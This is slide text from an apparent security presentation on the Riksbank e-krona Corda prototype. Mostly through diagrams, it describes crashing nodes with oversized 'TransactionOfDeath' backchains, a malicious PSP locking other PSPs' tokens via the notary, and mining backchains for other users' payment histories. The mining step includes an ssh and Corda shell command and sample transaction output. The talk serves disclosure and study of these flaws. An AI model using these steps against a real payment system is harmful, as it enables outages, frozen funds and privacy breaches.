Riksbank
Corda
notary
Riksbank
business
logic
DB
DB
Security and logic, e.g.
•
Interest
•
Back office functions
18
Detailed system description of the prototype
App
Disk
PSP1
business
logic
DB
DB
Riksbank
Corda
node
PSP1
Corda
node
Riksbank
Corda
notary
Riksbank
business
logic
DB
DB
DB
Security and logic, e.g.
•
Interest
•
Back office functions
Storage of
•
Outstanding CBDC
19
Detailed system description of the prototype
App
Disk
PSP1
business
logic
DB
DB
Riksbank
Corda
node
PSP1
Corda
node
Riksbank
Corda
notary
Riksbank
business
logic
Riksbank
RTGS
DB
DB
DB
DB
20
Detailed system description of the prototype
App
Disk
PSP1
business
logic
DB
DB
Riksbank
Corda
node
PSP1
Corda
node
Riksbank
Corda
notary
Riksbank
business
logic
Riksbank
RTGS
DB
DB
DB
DB
User alias
Logic
Security and logic, e.g.
•
Add and remove alias
•
Map alias to PSP and wallet
21
Detailed system description of the prototype
App
Disk
PSP1
business
logic
DB
DB
Riksbank
Corda
node
PSP1
Corda
node
Riksbank
Corda
notary
Riksbank
business
logic
Riksbank
RTGS
DB
DB
DB
DB
User alias
Logic
DB
Security and logic, e.g.
•
Add and remove alias
•
Map alias to PSP and wallet
Storage of
•
Alias PSP and wallet
22
Detailed system description of the prototype
App
Disk
PSP1
business
logic
DB
DB
Riksbank
Corda
node
PSP1
Corda
node
Riksbank
Corda
notary
Riksbank
business
logic
Riksbank
RTGS
DB
PSPn
Corda
node
PSP3
Corda
node
DB
PSP2
Corda
node
DB
DB
DB
DB
DB
User alias
Logic
DB
23
What is backchain?
And how to exploit bad implementation...
24
What is backchain?
And how to exploit bad implementation...
Riksbank
Corda
node
25
What is backchain?
And how to exploit bad implementation...
Riksbank
Corda
node
PSP1
Corda
node
Issue
1000
26
What is backchain?
And how to exploit bad implementation...
Riksbank
Corda
node
PSP1
Corda
node
Issue
1000
Transactions
And tokens
27
What is backchain?
And how to exploit bad implementation...
Riksbank
Corda
node
PSP1
Corda
node
Issue
1000
Transactions
And tokens
28
What is backchain?
And how to exploit bad implementation...
Riksbank
Corda
node
PSP1
Corda
node
Issue
1000
Transactions
And tokens
Tx: 1
29
What is backchain?
And how to exploit bad implementation...
Riksbank
Corda
node
PSP1
Corda
node
Issue
1000
Transactions
And tokens
Token#: 1[0]
Amount: 1000
Owner: PSP1
Sign: Riksbank
Reference: None
Tx: 1
30
What is backchain?
And how to exploit bad implementation...
Riksbank
Corda
node
PSP1
Corda
node
Issue
1000
Transactions
And tokens
Token#: 1[0]
Amount: 1000
Owner: PSP1
Sign: Riksbank
Reference: None
Tx: 1
PSP1
Corda
node
UserA withdraw
200
31
What is backchain?
And how to exploit bad implementation...
Riksbank
Corda
node
PSP1
Corda
node
Issue
1000
Transactions
And tokens
Token#: 1[0]
Amount: 1000
Owner: PSP1
Sign: Riksbank
Reference: None
Tx: 1
PSP1
Corda
node
UserA withdraw
200
32
What is backchain?
And how to exploit bad implementation...
Riksbank
Corda
node
PSP1
Corda
node
Issue
1000
Transactions
And tokens
Token#: 1[0]
Amount: 1000
Owner: PSP1
Sign: Riksbank
Reference: None
Tx: 1
PSP1
Corda
node
UserA withdraw
200
Tx: 2
33
What is backchain?
And how to exploit bad implementation...
Riksbank
Corda
node
PSP1
Corda
node
Issue
1000
Transactions
And tokens
Token#: 1[0]
Amount: 1000
Owner: PSP1
Sign: Riksbank
Reference: None
Tx: 1
PSP1
Corda
node
UserA withdraw
200
Token#: 2[0]
Amount: 200
Owner: UserA
Sign: PSP1
Reference: 1[0]
Tx: 2
34
What is backchain?
And how to exploit bad implementation...
Riksbank
Corda
node
PSP1
Corda
node
Issue
1000
Transactions
And tokens
Token#: 1[0]
Amount: 1000
Owner: PSP1
Sign: Riksbank
Reference: None
Tx: 1
PSP1
Corda
node
UserA withdraw
200
Token#: 2[0]
Amount: 200
Owner: UserA
Sign: PSP1
Reference: 1[0]
Tx: 2
Token#: 2[1]
Amount: 800
Owner: PSP1
Sign: PSP1
Reference: 1[0]
35
What is backchain?
And how to exploit bad implementation...
Riksbank
Corda
node
PSP1
Corda
node
Issue
1000
Transactions
And tokens
Token#: 1[0]
Amount: 1000
Owner: PSP1
Sign: Riksbank
Reference: None
Tx: 1
PSP1
Corda
node
UserA withdraw
200
Token#: 2[0]
Amount: 200
Owner: UserA
Sign: PSP1
Reference: 1[0]
Tx: 2
Token#: 2[1]
Amount: 800
Owner: PSP1
Sign: PSP1
Reference: 1[0]
36
What is backchain?
And how to exploit bad implementation...
Riksbank
Corda
node
PSP1
Corda
node
Issue
1000
Transactions
And tokens
Token#: 1[0]
Amount: 1000
Owner: PSP1
Sign: Riksbank
Reference: None
Tx: 1
PSP1
Corda
node
UserA withdraw
200
Token#: 2[0]
Amount: 200
Owner: UserA
Sign: PSP1
Reference: 1[0]
Tx: 2
Token#: 2[1]
Amount: 800
Owner: PSP1
Sign: PSP1
Reference: 1[0]
PSP2
Corda
node
UserA => UserB
50
37
What is backchain?
And how to exploit bad implementation...
Riksbank
Corda
node
PSP1
Corda
node
Issue
1000
Transactions
And tokens
Token#: 1[0]
Amount: 1000
Owner: PSP1
Sign: Riksbank
Reference: None
Tx: 1
PSP1
Corda
node
UserA withdraw
200
Token#: 2[0]
Amount: 200
Owner: UserA
Sign: PSP1
Reference: 1[0]
Tx: 2
Token#: 2[1]
Amount: 800
Owner: PSP1
Sign: PSP1
Reference: 1[0]
PSP2
Corda
node
UserA => UserB
50
38
What is backchain?
And how to exploit bad implementation...
Riksbank
Corda
node
PSP1
Corda
node
Issue
1000
Transactions
And tokens
Token#: 1[0]
Amount: 1000
Owner: PSP1
Sign: Riksbank
Reference: None
Tx: 1
PSP1
Corda
node
UserA withdraw
200
Token#: 2[0]
Amount: 200
Owner: UserA
Sign: PSP1
Reference: 1[0]
Tx: 2
Token#: 2[1]
Amount: 800
Owner: PSP1
Sign: PSP1
Reference: 1[0]
PSP2
Corda
node
UserA => UserB
50
Tx: 3
39
What is backchain?
And how to exploit bad implementation...
Riksbank
Corda
node
PSP1
Corda
node
Issue
1000
Transactions
And tokens
Token#: 1[0]
Amount: 1000
Owner: PSP1
Sign: Riksbank
Reference: None
Tx: 1
PSP1
Corda
node
UserA withdraw
200
Token#: 2[0]
Amount: 200
Owner: UserA
Sign: PSP1
Reference: 1[0]
Tx: 2
Token#: 2[1]
Amount: 800
Owner: PSP1
Sign: PSP1
Reference: 1[0]
PSP2
Corda
node
UserA => UserB
50
Token#: 3[0]
Amount: 50
Owner: UserB
Sign: UserA
Reference: 2[0]
Tx: 3
40
What is backchain?
And how to exploit bad implementation...
Riksbank
Corda
node
PSP1
Corda
node
Issue
1000
Transactions
And tokens
Token#: 1[0]
Amount: 1000
Owner: PSP1
Sign: Riksbank
Reference: None
Tx: 1
PSP1
Corda
node
UserA withdraw
200
Token#: 2[0]
Amount: 200
Owner: UserA
Sign: PSP1
Reference: 1[0]
Tx: 2
Token#: 2[1]
Amount: 800
Owner: PSP1
Sign: PSP1
Reference: 1[0]
PSP2
Corda
node
UserA => UserB
50
Token#: 3[0]
Amount: 50
Owner: UserB
Sign: UserA
Reference: 2[0]
Tx: 3
Token#: 3[1]
Amount: 150
Owner: UserA
Sign: UserA
Reference: 2[0]
41
What is backchain?
And how to exploit bad implementation...
Riksbank
Corda
node
PSP1
Corda
node
Issue
1000
Transactions
And tokens
Token#: 1[0]
Amount: 1000
Owner: PSP1
Sign: Riksbank
Reference: None
Tx: 1
PSP1
Corda
node
UserA withdraw
200
Token#: 2[0]
Amount: 200
Owner: UserA
Sign: PSP1
Reference: 1[0]
Tx: 2
Token#: 2[1]
Amount: 800
Owner: PSP1
Sign: PSP1
Reference: 1[0]
PSP2
Corda
node
UserA => UserB
50
Token#: 3[0]
Amount: 50
Owner: UserB
Sign: UserA
Reference: 2[0]
Tx: 3
Token#: 3[1]
Amount: 150
Owner: UserA
Sign: UserA
Reference: 2[0]
42
How to exploit token selection and long
backchains
Token#1
200
PSP1
PSP1 UserA
43
How to exploit token selection and long
backchains
Token#1
200
PSP1
PSP1 UserA
Withdrawal 3 and deposit 2
44
How to exploit token selection and long
backchains
Token#1
200
PSP1
PSP1 UserA
Withdrawal 3 and deposit 2
Token#2
197
PSP1
Token#3
3
UserA
45
How to exploit token selection and long
backchains
Token#1
200
PSP1
PSP1 UserA
Withdrawal 3 and deposit 2
Token#2
197
PSP1
Token#6
2
PSP1
Token#5
1
UserA
Token#3
3
UserA
46
How to exploit token selection and long
backchains
Token#1
200
PSP1
PSP1 UserA
Withdrawal 3 and deposit 2
Token#2
197
PSP1
Token#6
2
PSP1
Token#5
1
UserA
Historic
Transactions
Token#3
3
UserA
47
How to exploit token selection and long
backchains
Token#1
200
PSP1
PSP1 UserA
Withdrawal 3 and deposit 2
Token#2
197
PSP1
Token#6
2
PSP1
Token#5
1
UserA
Historic
Transactions
Token#3
3
UserA
48
How to exploit token selection and long
backchains
Token#1
200
PSP1
PSP1 UserA
Withdrawal 3 and deposit 2
Token#2
197
PSP1
Token#6
2
PSP1
Token#5
1
UserA
Historic
Transactions
Token#3
3
UserA
49
How to exploit token selection and long
backchains
Token#1
200
PSP1
PSP1 UserA
So UserA does this over and over again
Token#2
197
PSP1
Token#6
2
PSP1
Token#5
1
UserA
Historic
Transactions
Token#3
3
UserA
50
How to exploit token selection and long
backchains
Token#1
200
PSP1
PSP1 UserA
So UserA does this over and over again
Token#2
197
PSP1
Token#6
2
PSP1
Token#5
1
UserA
Historic
Transactions
Token#3
3
UserA
Token#7
194
PSP1
Token#8
3
PSP1
51
How to exploit token selection and long
backchains
Token#1
200
PSP1
PSP1 UserA
So UserA does this over and over again
Token#2
197
PSP1
Token#6
2
PSP1
Token#5
1
UserA
Historic
Transactions
Token#3
3
UserA
Token#7
194
PSP1
Token#8
3
PSP1
Token#10
2
PSP1
Token#9
1
UserA
52
How to exploit token selection and long
backchains
Token#1
200
PSP1
PSP1 UserA
So UserA does this over and over again
Token#6
2
PSP1
Token#5
1
UserA
Historic
Transactions
Token#3
3
UserA
Token#7
194
PSP1
Token#10
2
PSP1
Token#9
1
UserA
Token#2
197
PSP1
Token#8
3
PSP1
53
How to exploit token selection and long
backchains
Token#1
200
PSP1
PSP1 UserA
Many times
Token#6
2
PSP1
Token#5
1
UserA
Historic
Transactions
Token#3
3
UserA
Token#x
44
PSP1
Token#10
2
PSP1
Token#9
1
UserA
Token#2
197
PSP1
Token#8
3
PSP1
Token#x
3
PSP1
Token#x
3
PSP1
Token#x
3
PSP1
Token#x
3
PSP1
Token#x
3
PSP1
Token#x
2
PSP1
Token#x
1
UserA
Token#x
2
PSP1
Token#x
1
UserA
Token#x
2
PSP1
Token#x
1
UserA
Token#x
2
PSP1
Token#x
1
UserA
Token#x
2
PSP1
Token#x
1
UserA
Token#x
2
PSP1
Token#x
1
UserA
Token#x
2
PSP1
Token#x
1
UserA
Token#x
2
PSP1
Token#x
1
UserA
Token#x
2
PSP1
Token#x
1
UserA
Token#x
2
PSP1
Token#x
1
UserA
54
How to exploit token selection and long
backchains
Token#1
200
PSP1
PSP1 UserA
Deposit all tokens
Token#6
2
PSP1
Token#5
1
UserA
Historic
Transactions
Token#3
3
UserA
Token#x
44
PSP1
Token#10
2
PSP1
Token#9
1
UserA
Token#2
197
PSP1
Token#8
3
PSP1
Token#x
3
PSP1
Token#x
3
PSP1
Token#x
3
PSP1
Token#x
3
PSP1
Token#x
3
PSP1
Token#x
1
UserA
Token#x
2
PSP1
Token#x
2
PSP1
Token#x
1
UserA
Token#x
2
PSP1
Token#x
1
UserA
Token#x
2
PSP1
Token#x
1
UserA
Token#x
2
PSP1
Token#x
2
PSP1
Token#x
2
PSP1
Token#x
2
PSP1
Token#x
2
PSP1
Token#x
2
PSP1
Token#x
1
UserA
Token#x
1
UserA
Token#x
1
UserA
Token#x
1
UserA
Token#x
1
UserA
Token#x
1
UserA
Token#n
12
PSP1
55
How to exploit token selection and long
backchains
Token#1
200
PSP1
Token#6
2
PSP1
Token#5
1
UserA
Token#3
3
UserA
Token#x
44
PSP1
Token#2
197
PSP1
Token#8
3
PSP1
Token#x
3
PSP1
Token#x
3
PSP1
Token#x
3
PSP1
Token#x
3
PSP1
Token#x
3
PSP1
Token#x
2
PSP1
Token#n
12
PSP1
PSP1 Admin
Riksbank Corda node
Redeem
Token#9
1
UserA
Token#x
1
UserA
Token#x
1
UserA
Token#x
1
UserA
Token#x
1
UserA
Token#x
1
UserA
Token#x
1
UserA
Token#x
1
UserA
Token#x
1
UserA
Token#x
1
UserA
Token#x
1
UserA
Token#10
2
PSP1
Token#x
2
PSP1
Token#x
2
PSP1
Token#x
2
PSP1
Token#x
2
PSP1
Token#x
2
PSP1
Token#x
2
PSP1
Token#x
2
PSP1
Token#x
2
Token#x
56
Other setups with better effects
1500
PSP1
2000
PSP1
3000
PSP1
Several issue tokens to
get several merkle trees
100
UserA
57
Other setups with better effects
1500
PSP1
2000
PSP1
3000
PSP1
Several issue tokens to
get several merkle trees
Split tokens into hundreds
100
UserA
1
UserB
1
UserB
1
UserB
1
UserB
1
UserB
1
UserB
58
Other setups with better effects
1500
PSP1
2000
PSP1
3000
PSP1
Several issue tokens to
get several merkle trees
Split tokens into hundreds
100
UserA
1
UserB
1
UserB
1
UserB
1
UserB
1
UserB
1
UserB
Use hundreds of tokens in one transaction
5
UserA
59
Other setups with better effects
1500
PSP1
2000
PSP1
3000
PSP1
Several issue tokens to
get several merkle trees
Split tokens into hundreds
100
UserA
1
UserB
1
UserB
1
UserB
1
UserB
1
UserB
1
UserB
Use hundreds of tokens in one transaction
5
UserA
And do this over and over again
to get the TransactionOfDeath
60
Crash nodes with TransactionOfDeath
and permanently lock tokens
Sometimes crashes give inconsistencies.
PSP1
Corda
node
PSP3
Corda
node
UserA => UserC
Token#1
5
UserA
Token#2
5
UserC
61
Crash nodes with TransactionOfDeath
and permanently lock tokens
Sometimes crashes give inconsistencies.
PSP1
Corda
node
PSP3
Corda
node
UserA => UserC
Riksbank
Corda
notary
Token#1
5
UserA
Token#2
5
UserC
Mark Token#1 as used
62
Crash nodes with TransactionOfDeath
and permanently lock tokens
Sometimes crashes give inconsistencies.
PSP1
Corda
node
PSP3
Corda
node
UserA => UserC
Riksbank
Corda
notary
Token#1
5
UserA
Token#2
5
UserC
Mark Token#1 as used
63
Crash nodes with TransactionOfDeath
and permanently lock tokens
Sometimes crashes give inconsistencies.
PSP1
Corda
node
PSP3
Corda
node
UserA => UserC
Riksbank
Corda
notary
Token#1
5
UserA
Token#2
5
UserC
Mark Token#1 as used
Used token: Token#1
Available token: Token#1
64
Network problems, timeouts and in-memory
token selection can lock tokens until restarted
In the phase 1 prototype, a card payment is a signed transaction on the smart card traveling through the
Merchant's PSP to the card holder's PSP.
PSP1
Corda
node
PSP3
Corda
node
UserC => UserA
65
UserC
Network problems, timeouts and in-memory
token selection can lock tokens until restarted
In the phase 1 prototype, a card payment is a signed transaction on the smart card traveling through the
Merchant's PSP to the card holder's PSP.
PSP1
Corda
node
PSP3
Corda
node
UserC => UserA
Token#2
5
UserA
Token#1
5
UserC
66
UserC
Network problems, timeouts and in-memory
token selection can lock tokens until restarted
In the phase 1 prototype, a card payment is a signed transaction on the smart card traveling through the
Merchant's PSP to the card holder's PSP.
PSP1
Corda
node
PSP3
Corda
node
UserC => UserA
Riksbank
Corda
notary
Token#2
5
UserA
Token#1
5
UserC
Mark Token#1 as used
67
UserC
Network problems, timeouts and in-memory
token selection can lock tokens until restarted
In the phase 1 prototype, a card payment is a signed transaction on the smart card traveling through the
Merchant's PSP to the card holder's PSP.
PSP1
Corda
node
PSP3
Corda
node
UserC => UserA
Riksbank
Corda
notary
Token#2
5
UserA
Token#1
5
UserC
Mark Token#1 as used
68
UserC
Network problems, timeouts and in-memory
token selection can lock tokens until restarted
In the phase 1 prototype, a card payment is a signed transaction on the smart card traveling through the
Merchant's PSP to the card holder's PSP.
PSP1
Corda
node
PSP3
Corda
node
UserC => UserA
Riksbank
Corda
notary
Token#2
5
UserA
Token#1
5
UserC
Mark Token#1 as used
Available token: Token#1
Timeout!
Error!
69
UserC
Network problems, timeouts and in-memory
token selection can lock tokens until restarted
In the phase 1 prototype, a card payment is a signed transaction on the smart card traveling through the
Merchant's PSP to the card holder's PSP.
PSP1
Corda
node
PSP3
Corda
node
UserC => UserA
Riksbank
Corda
notary
Token#2
5
UserA
Token#1
5
UserC
Mark Token#1 as used
Used token: Token#1
Available token: Token#1
Timeout!
Error!
70
UserC
Evil PSP can lock tokens of other PSPs
As the evil PSP has the information about the tokens sent to others, the evil PSP can send those tokens to
the non-validating notary node to be marked as used.
EvilPSP
Corda
node
PSP3
Corda
node
UserA => UserC
ing.com
https://www.ingwb.com/media/3024436/
solutions-for-the-corda-security-and-privacy-
trade-off_-whitepaper.pdf
71
Evil PSP can lock tokens of other PSPs
As the evil PSP has the information about the tokens sent to others, the evil PSP can send those tokens to
the non-validating notary node to be marked as used.
EvilPSP
Corda
node
PSP3
Corda
node
UserA => UserC
Token#1
5
UserA
Token#2
5
UserC
ing.com
https://www.ingwb.com/media/3024436/
solutions-for-the-corda-security-and-privacy-
trade-off_-whitepaper.pdf
72
Evil PSP can lock tokens of other PSPs
As the evil PSP has the information about the tokens sent to others, the evil PSP can send those tokens to
the non-validating notary node to be marked as used.
EvilPSP
Corda
node
PSP3
Corda
node
UserA => UserC
Riksbank
Corda
notary
Token#1
5
UserA
Token#2
5
UserC
Mark Token#1 as used
ing.com
https://www.ingwb.com/media/3024436/
solutions-for-the-corda-security-and-privacy-
trade-off_-whitepaper.pdf
73
Evil PSP can lock tokens of other PSPs
As the evil PSP has the information about the tokens sent to others, the evil PSP can send those tokens to
the non-validating notary node to be marked as used.
EvilPSP
Corda
node
PSP3
Corda
node
UserA => UserC
Riksbank
Corda
notary
Token#1
5
UserA
Token#2
5
UserC
Mark Token#1 as used
Used token: Token#1
Available token: Token#2
ing.com
https://www.ingwb.com/media/3024436/
solutions-for-the-corda-security-and-privacy-
trade-off_-whitepaper.pdf
74
Evil PSP can lock tokens of other PSPs
As the evil PSP has the information about the tokens sent to others, the evil PSP can send those tokens to
the non-validating notary node to be marked as used.
EvilPSP
Corda
node
PSP3
Corda
node
UserA => UserC
Riksbank
Corda
notary
Token#1
5
UserA
Token#2
5
UserC
Mark Token#1 as used
Used token: Token#1
Available token: Token#2
Mark Token#2 as used
Used token: Token#2
ing.com
https://www.ingwb.com/media/3024436/
solutions-for-the-corda-security-and-privacy-
trade-off_-whitepaper.pdf
75
PSP1 Corda
And an ending note on token selection
Token#3
1000000
Owner:
PSP1
Token#2
1000000
Owner:
PSP1
Token#1
2000000
Owner:
PSP1
PSP1 UserA
PSP1 Admin
76
PSP1 Corda
And an ending note on token selection
Token#3
1000000
Owner:
PSP1
Token#2
1000000
Owner:
PSP1
Token#1
2000000
Owner:
PSP1
PSP1 UserA
PSP1 Admin
Redeem 3500000
Withdraw 50
77
PSP1 Corda
And an ending note on token selection
Token#3
1000000
Owner:
PSP1
Token#2
1000000
Owner:
PSP1
Token#1
2000000
Owner:
PSP1
PSP1 UserA
PSP1 Admin
Redeem 3500000
Withdraw 50
78
3500000 not available!
Try Again!
PSP1 Corda
And an ending note on token selection
Token#3
1000000
Owner:
PSP1
Token#2
1000000
Owner:
PSP1
Token#1
2000000
Owner:
PSP1
PSP1 UserA
PSP1 Admin
Withdraw 50
79
3500000 not available!
Try Again!
PSP1 Corda
And an ending note on token selection
Token#3
1000000
Owner:
PSP1
Token#2
1000000
Owner:
PSP1
Token#1
2000000
Owner:
PSP1
PSP1 UserA
Token#4
999950
Owner:
PSP1
PSP1 Admin
Token#5
50
Owner:
UserA
Got 50
80
Backchain and privacy
Transactions
And tokens
Token#: 1[0]
Amount: 1000
Owner: PSP1
Sign: Riksbank
Reference: None
Tx: 1
Token#: 2[0]
Amount: 200
Owner: UserA
Sign: PSP1
Reference: 1[0]
Tx: 2
Token#: 2[1]
Amount: 800
Owner: PSP1
Sign: PSP1
Reference: 1[0]
Token#: 3[0]
Amount: 50
Owner: UserB
Sign: UserA
Reference: 2[0]
Tx: 3
Token#: 3[1]
Amount: 150
Owner: UserA
Sign: UserA
Reference: 2[0]
Riksbank
Corda
node
PSP1
Corda
node
Issue
1000
PSP1
Corda
node
UserA withdraw
200
PSP2
Corda
node
UserA => UserB
50
To be able to verify authenticity of the tokens all historic transactions for that token is needed.
81
Backchain and privacy
Transactions
And tokens
Token#: 1[0]
Amount: 1000
Owner: PSP1
Sign: Riksbank
Reference: None
Tx: 1
Token#: 2[0]
Amount: 200
Owner: UserA
Sign: PSP1
Reference: 1[0]
Tx: 2
Token#: 2[1]
Amount: 800
Owner: PSP1
Sign: PSP1
Reference: 1[0]
Token#: 3[0]
Amount: 50
Owner: UserB
Sign: UserA
Reference: 2[0]
Tx: 3
Token#: 3[1]
Amount: 150
Owner: UserA
Sign: UserA
Reference: 2[0]
Riksbank
Corda
node
PSP1
Corda
node
Issue
1000
PSP1
Corda
node
UserA withdraw
200
PSP2
Corda
node
UserA => UserB
50
To be able to verify authenticity of the tokens all historic transactions for that token is needed.
82
Backchain and privacy
Token#: 1[0]
Amount: 1000
Owner: PSP1
Sign: Riksbank
Reference: None
Tx: 1
Token#: 2[0]
Amount: 200
Owner: UserA
Sign: PSP1
Reference: 1[0]
Tx: 2
Token#: 2[1]
Amount: 800
Owner: PSP1
Sign: PSP1
Reference: 1[0]
Token#: 3[0]
Amount: 50
Owner: UserB
Sign: UserA
Reference: 2[0]
Tx: 3
Token#: 3[1]
Amount: 150
Owner: UserA
Sign: UserA
Reference: 2[0]
PSP1
Corda
node
Issue
1000
PSP1
Corda
node
UserA withdraw
200
PSP2
Corda
node
UserA => UserB
50
So PSP2 can see how PSP1 did the issue and how UserA withdrew 200.
83
Backchain and privacy
Older and longer backchains reveal more.
PSP2 Admin
84
Backchain and privacy
Older and longer backchains reveal more.
UserA
PSP1
UserH
PSP2
60
PSP2 Admin
85
Backchain and privacy
Older and longer backchains reveal more.
UserC
PSP3
UserG
PSP1
UserA
PSP1
50
20
UserH
PSP2
60
PSP2 Admin
86
Backchain and privacy
Older and longer backchains reveal more.
UserD
PSP4
UserF
PSP4
UserC
PSP3
50
UserG
PSP1
50
UserA
PSP1
50
20
UserH
PSP2
60
PSP2 Admin
87
Backchain and privacy
UserA
PSP1
Older and longer backchains reveal more.
UserD
PSP4
325
UserE
PSP4
UserF
PSP4
100
UserC
PSP3
50
UserG
PSP1
50
UserA
PSP1
50
20
UserH
PSP2
60
PSP2 Admin
88
Backchain and privacy
PSP1
UserA
PSP1
withdraw
200
Older and longer backchains reveal more.
UserC
PSP3
75
UserD
PSP4
325
PSP4
UserE
PSP4
withdraw
400
UserF
PSP4
UserF
PSP4
100
100
UserC
PSP3
50
UserG
PSP1
50
UserA
PSP1
50
20
UserH
PSP2
60
PSP2 Admin
89
Backchain and privacy
PSP1
Issue
1000
UserA
PSP1
withdraw
200
Older and longer backchains reveal more.
PSP3
UserC
PSP3
withdraw
150
75
UserD
PSP4
325
PSP4
Issue
3000
UserE
PSP4
withdraw
400
UserF
PSP4
100
UserF
PSP4
100
100
UserC
PSP3
50
UserG
PSP1
50
UserA
PSP1
50
20
UserH
PSP2
60
PSP2 Admin
90
Backchain and privacy
PSP1
Issue
1000
UserA
PSP1
withdraw
200
Older and longer backchains reveal more.
PSP3
Issue
5000
UserC
PSP3
withdraw
150
75
UserD
PSP4
325
PSP4
Issue
3000
UserE
PSP4
withdraw
400
UserF
PSP4
100
UserF
PSP4
100
100
UserC
PSP3
50
UserG
PSP1
50
UserA
PSP1
50
20
UserH
PSP2
60
PSP2 Admin
91
Practical example: PSP2 backchain
The admin of PSP2 only has information from the PSP2 Corda node and the business layer of PSP2.
To get the backchain and to visualize it, the PSP2 admin has to:
• Extract the backchain
• Get the transactions
• Datamine
• Visualize
92
Practical example: Extract the backchain
Log in to the PSP2 Corda node and start the Corda node shell.
Run the command
run internalVerifiedTransactionsSnapshot
93
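For reference, a minimal session could look like the sketch below. The node address, port and
credentials are illustrative assumptions; run internalVerifiedTransactionsSnapshot is the Corda
shell command named above, and its YAML output is what the next slides walk through.

# SSH into the PSP2 Corda node shell (host, port and user are assumptions)
ssh -p 2222 admin@psp2-corda-node
# Dump every verified transaction the node stores -- including transactions
# received only as part of other tokens' backchains
run internalVerifiedTransactionsSnapshot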
Practical example: PSP2 backchain
- wire:
id: "6BE4262593EA89C5097FED35221CC0A27FE78F7BB6C10864E4E28269E8F2F038"
inputs:
- txhash: "5C8618DCFB36BFABB0B6DB66331EBEDB3699F50F4AC8FD2EB7291BD782DF5C53"
index: 0
outputs:
- data: !<com.r3.corda.lib.tokens.contracts.states.FungibleToken>
amount: "100.85 SEK issued by Riksbanken"
holder:
"aSq9DsNNvGhYxYyqA9wd2eduEAZ5AXWgJTbTGL7RG71TWPEaZJhNFKWZWRp7jCHtRqYdZshmAv1tawKDd55qDnXDFmkUSvMqQhaRdxaMPYinLSop88JwAPReBZJw"
- data: !<com.r3.corda.lib.tokens.contracts.states.FungibleToken>
amount: "5399.15 SEK issued by Riksbanken"
holder:
"aSq9DsNNvGhYxYyqA9wd2eduEAZ5AXWgJTbTFUZVr3NjFk7sDNTBjdg3q9sJNbZKfTVhDQ8vcyisu9mWsoMPA1Heqbb3ZbNirZFnBpgkuVDW7yWYsDiBWLGYdmDh"
commands:
- value: !<com.r3.corda.lib.tokens.contracts.commands.MoveTokenCommand>
token:
issuer: "O=Riksbanken, L=Stockholm, C=SE"
tokenType:
tokenIdentifier: "SEK"
inputs:
- 0
outputs:
- 0
- 1
signers:
- "aSq9DsNNvGhYxYyqA9wd2eduEAZ5AXWgJTbTFUZVr3NjFk7sDNTBjdg3q9sJNbZKfTVhDQ8vcyisu9mWsoMPA1Heqbb3ZbNirZFnBpgkuVDW7yWYsDiBWLGYdmDh"
94
Practical example: PSP2 backchain
- wire:
id: "6BE4262593EA89C5097FED35221CC0A27FE78F7BB6C10864E4E28269E8F2F038"
inputs:
- txhash: "5C8618DCFB36BFABB0B6DB66331EBEDB3699F50F4AC8FD2EB7291BD782DF5C53"
index: 0
outputs:
- data: !<com.r3.corda.lib.tokens.contracts.states.FungibleToken>
amount: "100.85 SEK issued by Riksbanken"
holder:
"aSq9DsNNvGhYxYyqA9wd2eduEAZ5AXWgJTbTGL7RG71TWPEaZJhNFKWZWRp7jCHtRqYdZshmAv1tawKDd55qDnXDFmkUSvMqQhaRdxaMPYinLSop88JwAPReBZJw"
- data: !<com.r3.corda.lib.tokens.contracts.states.FungibleToken>
amount: "5399.15 SEK issued by Riksbanken"
holder:
"aSq9DsNNvGhYxYyqA9wd2eduEAZ5AXWgJTbTFUZVr3NjFk7sDNTBjdg3q9sJNbZKfTVhDQ8vcyisu9mWsoMPA1Heqbb3ZbNirZFnBpgkuVDW7yWYsDiBWLGYdmDh"
commands:
- value: !<com.r3.corda.lib.tokens.contracts.commands.MoveTokenCommand>
token:
issuer: "O=Riksbanken, L=Stockholm, C=SE"
tokenType:
tokenIdentifier: "SEK"
inputs:
- 0
outputs:
- 0
- 1
signers:
- "aSq9DsNNvGhYxYyqA9wd2eduEAZ5AXWgJTbTFUZVr3NjFk7sDNTBjdg3q9sJNbZKfTVhDQ8vcyisu9mWsoMPA1Heqbb3ZbNirZFnBpgkuVDW7yWYsDiBWLGYdmDh"
95
Practical example: PSP2 backchain
- wire:
id: "6BE4262593EA89C5097FED35221CC0A27FE78F7BB6C10864E4E28269E8F2F038"
inputs:
- txhash: "5C8618DCFB36BFABB0B6DB66331EBEDB3699F50F4AC8FD2EB7291BD782DF5C53"
index: 0
outputs:
- data: !<com.r3.corda.lib.tokens.contracts.states.FungibleToken>
amount: "100.85 SEK issued by Riksbanken"
holder:
"aSq9DsNNvGhYxYyqA9wd2eduEAZ5AXWgJTbTGL7RG71TWPEaZJhNFKWZWRp7jCHtRqYdZshmAv1tawKDd55qDnXDFmkUSvMqQhaRdxaMPYinLSop88JwAPReBZJw"
- data: !<com.r3.corda.lib.tokens.contracts.states.FungibleToken>
amount: "5399.15 SEK issued by Riksbanken"
holder:
"aSq9DsNNvGhYxYyqA9wd2eduEAZ5AXWgJTbTFUZVr3NjFk7sDNTBjdg3q9sJNbZKfTVhDQ8vcyisu9mWsoMPA1Heqbb3ZbNirZFnBpgkuVDW7yWYsDiBWLGYdmDh"
commands:
- value: !<com.r3.corda.lib.tokens.contracts.commands.MoveTokenCommand>
token:
issuer: "O=Riksbanken, L=Stockholm, C=SE"
tokenType:
tokenIdentifier: "SEK"
inputs:
- 0
outputs:
- 0
- 1
signers:
- "aSq9DsNNvGhYxYyqA9wd2eduEAZ5AXWgJTbTFUZVr3NjFk7sDNTBjdg3q9sJNbZKfTVhDQ8vcyisu9mWsoMPA1Heqbb3ZbNirZFnBpgkuVDW7yWYsDiBWLGYdmDh"
96
Practical example: PSP2 backchain
- wire:
id: "6BE4262593EA89C5097FED35221CC0A27FE78F7BB6C10864E4E28269E8F2F038"
inputs:
- txhash: "5C8618DCFB36BFABB0B6DB66331EBEDB3699F50F4AC8FD2EB7291BD782DF5C53"
index: 0
outputs:
- data: !<com.r3.corda.lib.tokens.contracts.states.FungibleToken>
amount: "100.85 SEK issued by Riksbanken"
holder:
"aSq9DsNNvGhYxYyqA9wd2eduEAZ5AXWgJTbTGL7RG71TWPEaZJhNFKWZWRp7jCHtRqYdZshmAv1tawKDd55qDnXDFmkUSvMqQhaRdxaMPYinLSop88JwAPReBZJw"
- data: !<com.r3.corda.lib.tokens.contracts.states.FungibleToken>
amount: "5399.15 SEK issued by Riksbanken"
holder:
